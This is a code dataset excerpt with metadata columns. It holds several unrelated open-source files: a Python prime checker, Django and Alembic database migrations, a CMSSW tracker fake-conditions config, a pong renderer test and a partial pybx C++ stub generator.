repo_name
stringlengths 7
111
| __id__
int64 16.6k
19,705B
| blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
151
| content_id
stringlengths 40
40
| detected_licenses
sequence | license_type
stringclasses 2
values | repo_url
stringlengths 26
130
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
42
| visit_date
unknown | revision_date
unknown | committer_date
unknown | github_id
int64 14.6k
687M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 12
values | gha_fork
bool 2
classes | gha_event_created_at
unknown | gha_created_at
unknown | gha_updated_at
unknown | gha_pushed_at
unknown | gha_size
int64 0
10.2M
⌀ | gha_stargazers_count
int32 0
178k
⌀ | gha_forks_count
int32 0
88.9k
⌀ | gha_open_issues_count
int32 0
2.72k
⌀ | gha_language
stringlengths 1
16
⌀ | gha_archived
bool 1
class | gha_disabled
bool 1
class | content
stringlengths 10
2.95M
| src_encoding
stringclasses 5
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 10
2.95M
| extension
stringclasses 19
values | num_repo_files
int64 1
202k
| filename
stringlengths 4
112
| num_lang_files
int64 1
202k
| alphanum_fraction
float64 0.26
0.89
| alpha_fraction
float64 0.2
0.89
| hex_fraction
float64 0
0.09
| num_lines
int32 1
93.6k
| avg_line_length
float64 4.57
103
| max_line_length
int64 7
931
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
SyuziH/HTI-3-Group-2-Syuzi-Harutyunyan | 18,794,776,907,639 | a39282edd778a2bd2cb2d7576bae217257f9b47f | 8a55474e5a4297ef2e43e887eb1fa601855bd06c | /Homework 3/is_prime.py | 4a2a7bf99860b74b3b56e9c207beb59f35245677 | [] | no_license | https://github.com/SyuziH/HTI-3-Group-2-Syuzi-Harutyunyan | ae91410f61b5c177e6b9f6f1842060cf6e0853b8 | dad4b9dafc77d41e0fba14ed3e87f17b5fc549d4 | refs/heads/master | "2023-04-02T03:17:04.174947" | "2021-04-07T23:36:21" | "2021-04-07T23:36:21" | 328,346,617 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def is_prime(num):
    # Trial division over 2..num-1; prints the verdict instead of returning it.
    if num > 1:
        for i in range(2, num):
            if (num % i == 0):
                # Found a divisor, so num is composite.
                print('No')
                break
        else:
            # for/else: loop finished without break, so no divisor exists.
            print('Yes')
    else:
        # Numbers <= 1 are not prime by definition.
        print('Is not a prime number')
# Simple CLI driver: read one integer and classify it.
number = int(input('Enter the number '))
is_prime(number)
| UTF-8 | Python | false | false | 297 | py | 23 | is_prime.py | 21 | 0.444444 | 0.434343 | 0 | 15 | 18.8 | 40 |
masary2989/EC_site_webapp | 19,413,252,203,169 | f9c23434d0ebd66f4d69c1ba289027480d2faa55 | 23541da0aae0f5040cb47b1a55c604c05d4418cd | /eth_ec_server/ec_site/migrations/0001_initial.py | 1b879e3b5920e4d88e52bb669dc94a4d667dffca | [] | no_license | https://github.com/masary2989/EC_site_webapp | 17f30aafcb9d7747af60d324f4c7e61f5e251ba7 | a9f1c7bb36eb6855bcfdec78d484c368d89e9c2a | refs/heads/master | "2021-09-21T12:21:11.755539" | "2019-03-28T05:05:28" | "2019-03-28T05:05:28" | 162,418,975 | 0 | 0 | null | false | "2022-01-13T01:04:52" | "2018-12-19T10:06:11" | "2019-03-28T05:05:31" | "2022-01-13T01:04:49" | 129,569 | 0 | 0 | 30 | Visual Basic | false | false | # Generated by Django 2.1.4 on 2018-12-18 05:27
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated initial migration for the ec_site app: creates the
    # Address, order, Product and User models, then wires the relations
    # (order<->Product M2M, order->User and Address->User foreign keys).
    initial = True
    dependencies = [
    ]
    operations = [
        # Shipping/contact address; linked to User via the AddField below.
        migrations.CreateModel(
            name='Address',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('address', models.CharField(max_length=100)),
                ('message', models.CharField(max_length=300)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now_add=True)),
            ],
        ),
        # Purchase order; contract_tx presumably holds a blockchain tx id -- TODO confirm.
        migrations.CreateModel(
            name='order',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('contract_tx', models.BigIntegerField()),
                ('message', models.CharField(max_length=300)),
                ('payment', models.PositiveSmallIntegerField()),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now_add=True)),
            ],
        ),
        # Catalog item with an uploaded image and a price.
        migrations.CreateModel(
            name='Product',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100)),
                ('message', models.CharField(max_length=300)),
                ('image', models.ImageField(upload_to='ec_site/uploads/%Y/%m/%d/')),
                ('price', models.PositiveSmallIntegerField()),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now_add=True)),
            ],
        ),
        # Application-level user record (not Django's auth.User).
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100)),
                ('email', models.EmailField(max_length=254)),
                ('message', models.CharField(max_length=300)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now_add=True)),
            ],
        ),
        # order <-> Product many-to-many.
        migrations.AddField(
            model_name='order',
            name='pid',
            field=models.ManyToManyField(to='ec_site.Product'),
        ),
        # order -> User owner; deleted together with the user.
        migrations.AddField(
            model_name='order',
            name='uid',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ec_site.User'),
        ),
        # Address -> User owner; deleted together with the user.
        migrations.AddField(
            model_name='address',
            name='uid',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ec_site.User'),
        ),
    ]
| UTF-8 | Python | false | false | 3,030 | py | 34 | 0001_initial.py | 20 | 0.545215 | 0.532343 | 0 | 74 | 39.945946 | 114 |
Jazminnava/Mundo-de-productos | 4,398,046,532,952 | ec39a993722a60393fbc6c3739eddbb0abfbb643 | c62e1758762440c94098271d77c03482895a25d1 | /migrations/versions/ef581bcb9460_inital_mirtaions.py | 82ca82bb36af2a4da0af20e66f3ec5708694a2fc | [] | no_license | https://github.com/Jazminnava/Mundo-de-productos | 548e61d9a21e67388f9bbe1509c2b0ca94ef9ee4 | 8748587d62a4cbafd01e20f4e7a1a63b95fb2e9e | refs/heads/master | "2022-12-18T19:15:44.141215" | "2020-09-12T19:47:18" | "2020-09-12T19:47:18" | 295,008,059 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """inital mirtaions
Revision ID: ef581bcb9460
Revises:
Create Date: 2020-08-05 01:02:02.400739
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'ef581bcb9460'  # unique id of this migration
down_revision = None  # first migration in the chain; nothing to roll back to
branch_labels = None
depends_on = None
def upgrade():
    """Create the initial schema: person tables, catalog tables and sales."""
    # ### commands auto generated by Alembic - please adjust! ###
    # The person tables (administrador/cliente/dueño/vendedor) all share the
    # same layout: name fields, contact info, street address and a photo path.
    op.create_table('administrador',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(length=80), nullable=False),
    sa.Column('apellidop', sa.String(length=80), nullable=False),
    sa.Column('apellidom', sa.String(length=80), nullable=False),
    sa.Column('edad', sa.String(length=80), nullable=False),
    sa.Column('telefono', sa.String(length=80), nullable=False),
    sa.Column('calle', sa.String(length=80), nullable=False),
    sa.Column('colonia', sa.String(length=80), nullable=False),
    sa.Column('numdire', sa.String(length=70), nullable=False),
    sa.Column('image_1', sa.String(length=150), nullable=False),
    sa.PrimaryKeyConstraint('id')
    )
    # Lookup table: product brand names (unique).
    op.create_table('brand',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(length=40), nullable=False),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('name')
    )
    # Lookup table: product category names (unique).
    op.create_table('category',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(length=40), nullable=False),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('name')
    )
    op.create_table('cliente',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(length=80), nullable=False),
    sa.Column('apellidop', sa.String(length=80), nullable=False),
    sa.Column('apellidom', sa.String(length=80), nullable=False),
    sa.Column('edad', sa.String(length=80), nullable=False),
    sa.Column('telefono', sa.String(length=80), nullable=False),
    sa.Column('calle', sa.String(length=80), nullable=False),
    sa.Column('colonia', sa.String(length=80), nullable=False),
    sa.Column('numdire', sa.String(length=70), nullable=False),
    sa.Column('image_1', sa.String(length=150), nullable=False),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table('dueño',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(length=80), nullable=False),
    sa.Column('apellidop', sa.String(length=80), nullable=False),
    sa.Column('apellidom', sa.String(length=80), nullable=False),
    sa.Column('edad', sa.String(length=80), nullable=False),
    sa.Column('telefono', sa.String(length=80), nullable=False),
    sa.Column('calle', sa.String(length=80), nullable=False),
    sa.Column('colonia', sa.String(length=80), nullable=False),
    sa.Column('numdire', sa.String(length=70), nullable=False),
    sa.Column('image_1', sa.String(length=150), nullable=False),
    sa.PrimaryKeyConstraint('id')
    )
    # Web account registration record (unique username/email).
    op.create_table('register',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(length=50), nullable=True),
    sa.Column('f_name', sa.String(length=50), nullable=True),
    sa.Column('username', sa.String(length=50), nullable=True),
    sa.Column('email', sa.String(length=50), nullable=True),
    sa.Column('password', sa.String(length=200), nullable=True),
    sa.Column('state', sa.String(length=50), nullable=True),
    sa.Column('city', sa.String(length=50), nullable=True),
    sa.Column('contact', sa.String(length=50), nullable=True),
    sa.Column('address', sa.String(length=50), nullable=True),
    sa.Column('zipcode', sa.String(length=50), nullable=True),
    sa.Column('profile', sa.String(length=200), nullable=True),
    sa.Column('date_created', sa.DateTime(), nullable=False),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('email'),
    sa.UniqueConstraint('username')
    )
    # Login user (unique username/email).
    op.create_table('user',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(length=30), nullable=False),
    sa.Column('username', sa.String(length=80), nullable=False),
    sa.Column('email', sa.String(length=120), nullable=False),
    sa.Column('password', sa.String(length=180), nullable=False),
    sa.Column('profile', sa.String(length=180), nullable=False),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('email'),
    sa.UniqueConstraint('username')
    )
    op.create_table('vendedor',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(length=80), nullable=False),
    sa.Column('apellidop', sa.String(length=80), nullable=False),
    sa.Column('apellidom', sa.String(length=80), nullable=False),
    sa.Column('edad', sa.String(length=80), nullable=False),
    sa.Column('telefono', sa.String(length=80), nullable=False),
    sa.Column('calle', sa.String(length=80), nullable=False),
    sa.Column('colonia', sa.String(length=80), nullable=False),
    sa.Column('numdire', sa.String(length=70), nullable=False),
    sa.Column('image_1', sa.String(length=150), nullable=False),
    sa.PrimaryKeyConstraint('id')
    )
    # Product catalog entry; references brand and category lookup tables.
    op.create_table('addproduct',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(length=80), nullable=False),
    sa.Column('price', sa.Numeric(precision=10, scale=2), nullable=False),
    sa.Column('discount', sa.Integer(), nullable=False),
    sa.Column('stock', sa.Integer(), nullable=False),
    sa.Column('colors', sa.Text(), nullable=False),
    sa.Column('desc', sa.Text(), nullable=False),
    sa.Column('pub_date', sa.DateTime(), nullable=False),
    sa.Column('brand_id', sa.Integer(), nullable=False),
    sa.Column('category_id', sa.Integer(), nullable=False),
    sa.Column('image_1', sa.String(length=150), nullable=False),
    sa.Column('image_2', sa.String(length=150), nullable=False),
    sa.Column('image_3', sa.String(length=150), nullable=False),
    sa.ForeignKeyConstraint(['brand_id'], ['brand.id'], ),
    sa.ForeignKeyConstraint(['category_id'], ['category.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    # Sale record tying a client, a seller and a product together.
    op.create_table('venta',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(length=80), nullable=False),
    sa.Column('precio', sa.String(length=80), nullable=False),
    sa.Column('total', sa.String(length=80), nullable=False),
    sa.Column('cliente_id', sa.Integer(), nullable=False),
    sa.Column('vendedor_id', sa.Integer(), nullable=False),
    sa.Column('addproduct_id', sa.Integer(), nullable=False),
    sa.ForeignKeyConstraint(['addproduct_id'], ['addproduct.id'], ),
    sa.ForeignKeyConstraint(['cliente_id'], ['cliente.id'], ),
    sa.ForeignKeyConstraint(['vendedor_id'], ['vendedor.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    # ### end Alembic commands ###
def downgrade():
    """Drop every table created by upgrade(), children before parents."""
    # ### commands auto generated by Alembic - please adjust! ###
    # Reverse dependency order so foreign-key constraints never dangle.
    for table_name in ('venta', 'addproduct', 'vendedor', 'user', 'register',
                       'dueño', 'cliente', 'category', 'brand', 'administrador'):
        op.drop_table(table_name)
    # ### end Alembic commands ###
| UTF-8 | Python | false | false | 7,135 | py | 21 | ef581bcb9460_inital_mirtaions.py | 8 | 0.666059 | 0.641105 | 0 | 160 | 43.58125 | 74 |
amkalsi/cmssw | 2,448,131,381,593 | 5d9bb25a263db52197a1f1b04574bc5af57da158 | 006ff11fd8cfd5406c6f4318f1bafa1542095f2a | /SLHCUpgradeSimulations/Geometry/python/fakeConditions_Phase1_cff.py | 105dcbf9971250dc22709c419f43bebd6ea7d0f6 | [] | permissive | https://github.com/amkalsi/cmssw | 8ac5f481c7d7263741b5015381473811c59ac3b1 | ad0f69098dfbe449ca0570fbcf6fcebd6acc1154 | refs/heads/CMSSW_7_4_X | "2021-01-19T16:18:22.857382" | "2016-08-09T16:40:50" | "2016-08-09T16:40:50" | 262,608,661 | 0 | 0 | Apache-2.0 | true | "2020-05-09T16:10:07" | "2020-05-09T16:10:07" | "2020-05-08T19:57:19" | "2020-05-09T14:58:01" | 1,118,070 | 0 | 0 | 0 | null | false | false | import FWCore.ParameterSet.Config as cms
# Fake pixel gain calibration read from an empty skimmed-geometry text file.
siPixelFakeGainOfflineESSource = cms.ESSource("SiPixelFakeGainOfflineESSource",
    file = cms.FileInPath('SLHCUpgradeSimulations/Geometry/data/PhaseI/EmptyPixelSkimmedGeometry_phase1.txt')
    )
es_prefer_fake_gain = cms.ESPrefer("SiPixelFakeGainOfflineESSource","siPixelFakeGainOfflineESSource")
# Fake strip noise: parametrized by strip length (slope/quote in deconvolution mode).
from CalibTracker.SiStripESProducers.fake.SiStripNoisesFakeESSource_cfi import *
SiStripNoisesGenerator.NoiseStripLengthSlope=cms.vdouble(51.) #dec mode
SiStripNoisesGenerator.NoiseStripLengthQuote=cms.vdouble(630.)
siStripNoisesFakeESSource = cms.ESSource("SiStripNoisesFakeESSource")
es_prefer_fake_strip_noise = cms.ESPrefer("SiStripNoisesFakeESSource",
                                          "siStripNoisesFakeESSource")
# Fake strip quality (all channels good).
from CalibTracker.SiStripESProducers.fake.SiStripQualityFakeESSource_cfi import *
siStripQualityFakeESSource = cms.ESSource("SiStripQualityFakeESSource")
es_prefer_fake_strip_quality = cms.ESPrefer("SiStripQualityFakeESSource",
                                            "siStripQualityFakeESSource")
# Fake strip pedestals.
from CalibTracker.SiStripESProducers.fake.SiStripPedestalsFakeESSource_cfi import *
siStripPedestalsFakeESSource = cms.ESSource("SiStripPedestalsFakeESSource")
es_prefer_fake_strip_pedestal = cms.ESPrefer("SiStripPedestalsFakeESSource",
                                             "siStripPedestalsFakeESSource")
# Fake Lorentz angle, both for reconstruction and for simulation.
from CalibTracker.SiStripESProducers.fake.SiStripLorentzAngleFakeESSource_cfi import *
siStripLorentzAngleFakeESSource = cms.ESSource("SiStripLorentzAngleFakeESSource")
es_prefer_fake_strip_LA = cms.ESPrefer("SiStripLorentzAngleFakeESSource",
                                       "siStripLorentzAngleFakeESSource")
siStripLorentzAngleSimFakeESSource = cms.ESSource("SiStripLorentzAngleSimFakeESSource")
es_prefer_fake_strip_LA_sim = cms.ESPrefer("SiStripLorentzAngleSimFakeESSource",
                                           "siStripLorentzAngleSimFakeESSource")
# Fake APV gain: fixed gain of 1.0 with no spread, for reco and sim alike.
from CalibTracker.SiStripESProducers.fake.SiStripApvGainFakeESSource_cfi import *
SiStripApvGainGenerator.MeanGain=cms.double(1.0)
SiStripApvGainGenerator.SigmaGain=cms.double(0.0)
SiStripApvGainGenerator.genMode = cms.string("default")
myStripApvGainFakeESSource = cms.ESSource("SiStripApvGainFakeESSource")
es_prefer_myStripApvGainFakeESSource = cms.ESPrefer("SiStripApvGainFakeESSource",
                                                    "myStripApvGainFakeESSource")
myStripApvGainSimFakeESSource = cms.ESSource("SiStripApvGainSimFakeESSource")
es_prefer_myStripApvGainSimFakeESSource = cms.ESPrefer("SiStripApvGainSimFakeESSource",
                                                       "myStripApvGainSimFakeESSource")
# Fake strip thresholds.
from CalibTracker.SiStripESProducers.fake.SiStripThresholdFakeESSource_cfi import *
siStripThresholdFakeESSource = cms.ESSource("SiStripThresholdFakeESSource")
es_prefer_fake_strip_threshold = cms.ESPrefer("SiStripThresholdFakeESSource",
                                              "siStripThresholdFakeESSource")
# from Geometry.TrackerGeometryBuilder.trackerGeometry_cfi import * Double check this later
# TrackerDigiGeometryESModule.applyAlignment = False
# Measurement tracker: ignore strip quality DBs since conditions are fake.
from RecoTracker.MeasurementDet.MeasurementTrackerESProducer_cfi import *
MeasurementTracker.inactiveStripDetectorLabels = cms.VInputTag()
MeasurementTracker.UseStripModuleQualityDB = cms.bool(False)
MeasurementTracker.UseStripAPVFiberQualityDB = cms.bool(False)
# Fake beam spot centered at the origin with small transverse widths.
from RecoVertex.BeamSpotProducer.BeamSpotFakeParameters_cfi import *
BeamSpotFakeConditions.X0 = cms.double(0.0)
BeamSpotFakeConditions.Y0 = cms.double(0.0)
BeamSpotFakeConditions.Z0 = cms.double(0.0)
BeamSpotFakeConditions.dxdz = cms.double(0.0)
BeamSpotFakeConditions.dydz = cms.double(0.0)
BeamSpotFakeConditions.sigmaZ = cms.double(5.3)
BeamSpotFakeConditions.widthX = cms.double(0.0015)
BeamSpotFakeConditions.widthY = cms.double(0.0015)
BeamSpotFakeConditions.emittanceX = cms.double(0.)
BeamSpotFakeConditions.emittanceY = cms.double(0.)
BeamSpotFakeConditions.betaStar = cms.double(0.)
BeamSpotFakeConditions.errorX0 = cms.double(0.00002)
BeamSpotFakeConditions.errorY0 = cms.double(0.00002)
BeamSpotFakeConditions.errorZ0 = cms.double(0.04000)
BeamSpotFakeConditions.errordxdz = cms.double(0.0)
BeamSpotFakeConditions.errordydz = cms.double(0.0)
BeamSpotFakeConditions.errorSigmaZ = cms.double(0.03000)
BeamSpotFakeConditions.errorWidth = cms.double(0.00003)
es_prefer_beamspot = cms.ESPrefer("BeamSpotFakeConditions","")
# Tracking-truth matching volume (radius/z in cm -- TODO confirm units).
from SimGeneral.TrackingAnalysis.trackingParticles_cfi import *
mergedtruth.volumeRadius = cms.double(100.0)
mergedtruth.volumeZ = cms.double(900.0)
mergedtruth.discardOutVolume = cms.bool(True)
#from Geometry.TrackerNumberingBuilder.pixelSLHCGeometryConstants_cfi import *
from Geometry.TrackerGeometryBuilder.idealForDigiTrackerSLHCGeometry_cff import *
| UTF-8 | Python | false | false | 4,881 | py | 2,051 | fakeConditions_Phase1_cff.py | 1,842 | 0.774227 | 0.757222 | 0 | 89 | 53.842697 | 113 |
dkeefe3773/pong-rl | 15,582,141,366,338 | e3844b275290147c174b2ea4bc88e34c90d23451 | 541222c60bd307affe8bf54a1427f148f2e8d3a1 | /apps/game_render_test.py | 9e053c6b237b8414099c39ceb80546bde09da625 | [
"MIT"
] | permissive | https://github.com/dkeefe3773/pong-rl | e9b06bc1412b489ecb42d0ed2e3e5d612348f8cd | e0d548267d7e0ca1b8690224cfd827af8ff571ab | refs/heads/master | "2020-12-04T15:53:35.572060" | "2020-07-05T05:26:30" | "2020-07-05T05:26:30" | 231,824,795 | 0 | 0 | MIT | false | "2020-09-06T04:10:28" | "2020-01-04T20:35:37" | "2020-07-05T05:27:21" | "2020-09-06T04:08:31" | 146 | 0 | 0 | 1 | Python | false | false | import time
from gamerender.pongrenders import DefaultPongRenderer
from injections import providers
from proto_gen.gamemaster_pb2 import PlayerIdentifier, PaddleType
def test_game_render():
    """Manual smoke test: register two players and start a rendered game."""
    # Identifiers for the two paddles.
    left_player = PlayerIdentifier(player_name="LEFT_PLAYER",
                                   paddle_strategy_name="LEFT_STRATEGY",
                                   paddle_type=PaddleType.LEFT)
    right_player = PlayerIdentifier(player_name="RIGHT_PLAYER",
                                    paddle_strategy_name="RIGHT_STRATEGY",
                                    paddle_type=PaddleType.RIGHT)
    renderer: DefaultPongRenderer = providers.GameRendererProviders.pong_renderer()
    # Register the players one second apart, then kick off the match.
    renderer.register_player(left_player)
    time.sleep(1)
    renderer.register_player(right_player)
    time.sleep(1)
    renderer.start_game()
if __name__ == "__main__":
test_game_render()
| UTF-8 | Python | false | false | 995 | py | 43 | game_render_test.py | 38 | 0.621106 | 0.61809 | 0 | 31 | 31.096774 | 88 |
asmirnov69/pybx | 17,016,660,443,549 | 0f190925d30a1873d02f85c299e96f2797ac76d9 | 732a541fd311256d1468e2ad50d8d11e27fe0a15 | /src/libpybx-py/codegen_cpp.py | 4cd01e20232ee5e6c3cb0e02aff98cfa7c5b502f | [] | no_license | https://github.com/asmirnov69/pybx | 1ff929824f059a95dbd7ca4a2fe3a59fd8eeed39 | e98db07297b26f0d477ef4f28894573f08c967a6 | refs/heads/master | "2023-02-20T17:58:13.844574" | "2021-01-14T03:56:11" | "2021-01-14T03:56:11" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import ipdb
import os.path
def generate_prolog(source_pybx_fn, out_fd):
    """Write the common C++ header prologue (include guard, helper macros,
    standard and libpybx includes) to *out_fd*."""
    # Include-guard token: file basename up to the first dot, upper-cased.
    guard = os.path.basename(source_pybx_fn).partition(".")[0].upper()
    header_lines = [
        "// -*- c++ -*-",
        f"// generated code: source - {source_pybx_fn}",
        f"#ifndef __{guard}_STUBS_HH__",
        f"#define __{guard}_STUBS_HH__",
        "#define TOKENPASTE(x, y) x ## y",
        "#define TOKENPASTE2(x, y) TOKENPASTE(x, y)",
        "#define UNIQUE static int TOKENPASTE2(Unique_, __LINE__)",
        "#include <memory>",
        "#include <string>",
        "#include <stdexcept>",
        "using namespace std;",
        "#include <kvan/json-io.h>",
        "#include <libpybx-cpp/communicator.h>",
        "#include <libpybx-cpp/proto.h>",
        "#include <libpybx-cpp/remote-methods.h>",
    ]
    # The trailing double newline mirrors print()-ing a template that already
    # ends with a newline.
    out_fd.write("\n".join(header_lines) + "\n\n")
def generate_epilog(out_fd):
    """Close the include guard opened by generate_prolog()."""
    out_fd.write("#endif\n")
def get_cpp_namespace(identifier):
    """Map a pybx module name onto its C++ namespace (pybx::<module>)."""
    return f"pybx::{identifier}"
def generate_struct_def(struct_def, out_fd):
    """Emit the C++ struct for *struct_def* plus its get_struct_descriptor<>
    specialization used for JSON (de)serialization."""
    ns = get_cpp_namespace(struct_def.def_type.__module__)

    def emit(line):
        print(line, file=out_fd)

    # struct definition inside the pybx namespace
    emit(f"namespace {ns} {{")
    emit(f"struct {struct_def.name} {{")
    for field in struct_def.fields:
        field_name = field.get_member_name()
        field_type = field.get_member_type().get_cpp_code_name()
        emit(f"  {field_type} {field_name};")
    emit("};\n}")
    # descriptor specialization: one make_member_descriptor per field
    emit(f"template <> inline StructDescriptor get_struct_descriptor<{ns}::{struct_def.name}>()")
    emit("{")
    emit("  static const StructDescriptor sd = {")
    for field in struct_def.fields:
        field_name = field.get_member_name()
        emit(f"    make_member_descriptor(\"{field_name}\", &{ns}::{struct_def.name}::{field_name}),")
    emit("  };")
    emit("  return sd;")
    emit("}")
def generate_enum_def(enum_def, out_fd):
    """Emit a C++ `enum class` for *enum_def* together with the string
    conversion helpers get_enum_value_string / set_enum_value."""
    ns = get_cpp_namespace(enum_def.def_type.__module__)

    def emit(line):
        print(line, file=out_fd)

    # enum class definition
    emit(f"namespace {ns} {{")
    emit(f"enum class {enum_def.name} {{")
    for member, value in zip(enum_def.members, enum_def.member_values):
        emit(f"{member} = {value},")
    emit("};")
    emit("}")
    # get_enum_value_string: enum -> string via a switch
    emit(f"template <> inline std::string get_enum_value_string<{ns}::{enum_def.name}>({ns}::{enum_def.name} v) {{")
    emit("  std::string ret;")
    emit("  switch (v) {")
    for member, _unused in zip(enum_def.members, enum_def.member_values):
        emit(f"  case {ns}::{enum_def.name}::{member}: ret = \"{member}\"; break;")
    emit("  }")
    emit("  return ret;")
    emit("}")
    # set_enum_value: string -> enum, throwing on unknown input
    emit(f"template <> inline void set_enum_value<{ns}::{enum_def.name}>({ns}::{enum_def.name}* v, const std::string& new_v)")
    emit("{")
    for idx, member in enumerate(enum_def.members):
        branch_keyword = "if" if idx == 0 else "else if"
        emit(f"  {branch_keyword} (new_v == \"{member}\") *v = {ns}::{enum_def.name}::{member};")
    emit("  else {")
    emit("    std::ostringstream m;")
    emit(f"    m << \"set_enum_value for {enum_def.name}: unknown string \" << new_v;")
    emit("    throw runtime_error(m.str());")
    emit("  }")
    emit("}")
def generate_interface_client_forward_declarations(module_def, out_fd):
    """Forward-declare the remote-object-proxy (_rop) class of every
    interface in *module_def*."""
    ns = get_cpp_namespace(module_def.name)
    print(f"namespace {ns} {{", file=out_fd)
    for iface in module_def.interfaces:
        print(f"class {iface.name}_rop;", file=out_fd)
    print("}", file=out_fd)
def generate_interface_client_declarations(interface_def, out_fd):
    """Emit the client-side proxy (_rop) class declaration for an interface,
    plus the StructDescriptor specialization that serializes its ids."""
    ns = get_cpp_namespace(interface_def.def_type.__module__)
    rop_name = interface_def.name + "_rop"

    def emit(line):
        print(line, file=out_fd)

    emit(f"namespace {ns} {{")
    emit(f"class {rop_name} {{")
    emit("private:")
    emit("  ::pybx::Communicator* comm{nullptr};")
    emit("  std::shared_ptr<ix::WebSocket> ws;")
    emit("public:")
    emit("  bool oneway{false};")
    emit("  std::string object_id;")
    emit(f"  std::string __interface_type{{\"{ns}.{interface_def.name}\"}};")
    # constructors and the late-activation hook
    emit(f"  {rop_name}();")
    emit(f"  {rop_name}(::pybx::Communicator* comm, std::shared_ptr<ix::WebSocket> ws, const std::string& ws_url, const std::string& object_id);")
    emit(f"  {rop_name}(::pybx::Communicator* comm, const std::string& object_id);")
    emit(f"  void activate(::pybx::Communicator* comm, std::shared_ptr<ix::WebSocket> ws);")
    # one declaration per remote method
    for method in interface_def.methods:
        ret_type = method.get_method_return_type().get_cpp_code_name()
        arg_list = ", ".join(
            arg_type.get_cpp_code_name() + " " + arg_name
            for arg_type, arg_name in zip(method.get_method_arg_types(),
                                          method.get_method_args()))
        emit(f"  {ret_type} {method.name}({arg_list});")
    emit("};")
    emit("}")
    # get_struct_descriptor for rop class: only the ids travel on the wire
    emit(f"template <> inline StructDescriptor get_struct_descriptor<{ns}::{rop_name}>()")
    emit("{")
    emit("  static const StructDescriptor sd = {")
    emit(f"    make_member_descriptor(\"object_id\", &{ns}::{rop_name}::object_id),")
    emit(f"    make_member_descriptor(\"__interface_type\", &{ns}::{rop_name}::__interface_type),")
    emit("  };")
    emit("  return sd;")
    emit("}")
def generate_interface_server_declarations(interface_def, out_fd):
    """Emit the abstract server base class for *interface_def* and, for each
    method, a ::pybx::method_impl struct (args_t / return_t) plus the
    StructDescriptor specializations that (de)serialize its messages."""
    cpp_namespace = get_cpp_namespace(interface_def.def_type.__module__)
    # abstract base class: one pure-virtual function per interface method
    print(f"namespace {cpp_namespace} {{", file = out_fd)
    print(f"class {interface_def.name} : public ::pybx::Object {{", file = out_fd)
    print("public:", file = out_fd)
    print(f"  typedef {interface_def.name}_rop rop_t;", file = out_fd)
    #ipdb.set_trace()
    for m_def in interface_def.methods:
        m_cpp_ret_type = m_def.get_method_return_type().get_cpp_code_name()
        m_args_l = []
        for t, n in zip(m_def.get_method_arg_types(), m_def.get_method_args()):
            m_args_l.append(t.get_cpp_code_name() + " " + n)
        m_args = ", ".join(m_args_l)
        print(f"  virtual {m_cpp_ret_type} {m_def.name}({m_args}) = 0;", file = out_fd)
    print(f"}};", file = out_fd)
    print(f"}}", file = out_fd)
    # method implementations
    for m_def in interface_def.methods:
        method_impl_class_name = f"{interface_def.name}__{m_def.name}"
        # method impl class: bundles the wire-format argument and return
        # structs with the do_call() dispatcher declaration
        print(f"namespace {cpp_namespace} {{", file = out_fd)
        print(f"struct {method_impl_class_name} : public ::pybx::method_impl", file = out_fd)
        print("{", file = out_fd)
        print("  struct args_t {", file = out_fd)
        m_args_l = []
        for t, n in zip(m_def.get_method_arg_types(), m_def.get_method_args()):
            tt = t.get_cpp_code_name()
            m_args_l.append(f"{tt} {n};")
        m_args = "\n".join(m_args_l)
        print(f"    {m_args}", file = out_fd)
        print("  };", file = out_fd)
        print("  struct return_t {", file = out_fd)
        m_cpp_ret_type = m_def.get_method_return_type().get_cpp_code_name()
        # void returns are represented as json_null_t on the wire
